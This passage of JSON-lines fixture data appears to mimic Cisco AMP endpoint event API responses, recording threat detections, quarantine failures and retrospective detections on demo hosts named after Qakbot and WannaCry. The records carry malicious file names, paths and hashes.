Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 